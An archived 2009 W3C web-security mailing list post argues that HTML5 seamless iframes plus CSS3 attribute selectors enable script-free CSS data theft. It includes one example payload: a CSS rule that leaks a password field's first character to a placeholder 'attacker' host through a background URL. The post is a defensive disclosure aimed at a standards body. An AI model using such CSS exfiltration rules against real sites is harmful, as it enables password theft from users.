W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Seamless iframes + CSS3 selectors = bad idea

From: Eduardo Vela <sirdarckcat@gmail.com>
Date: Fri, 4 Dec 2009 22:39:44 +0800
Message-ID: <8ba534860912040639k3f1bd1a9pb8d7ee3224fcc26a@mail.gmail.com>
To: public-web-security@w3.org
I sincerely understand why people want seamless iframes on HTML5.. I mean,
I've been there.. but sometimes the better way to do something is not to do
it.

The perfect example are seamless iframes (defined in html5) and CSS3
selectors.

I've showed (together with David Lindsay, and Gareth Heyes) expressed
several times that we think this is a bad idea.

We always receive the same answer "seamless iframes are same-origin!" and
believe me, I know.. but guess what? javascript is also same origin.. and it
also creates problems.

What I see with those awesome CSS3 selectors such as:

input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}

create a new type of XSS attacks, and those are purely CSS based XSS
attacks.. without JS.. that will allow an attacker to read arbitrary files
from the page WITHOUT the need of JS.

I really hope people in here know that a cool feature is sometimes not such
a good idea, and hopefully, we can see how to resolve this issue..

References: The Sexy Assassin - BlueHat 2008 Presentation<http://p42.us/css/>
http://p42.us/css/
Favorite XSS - BlackHat 2009 Presentation <http://p42.us/favxss/>
http://p42.us/favxss/
Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/
Received on Saturday, 5 December 2009 14:29:23 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT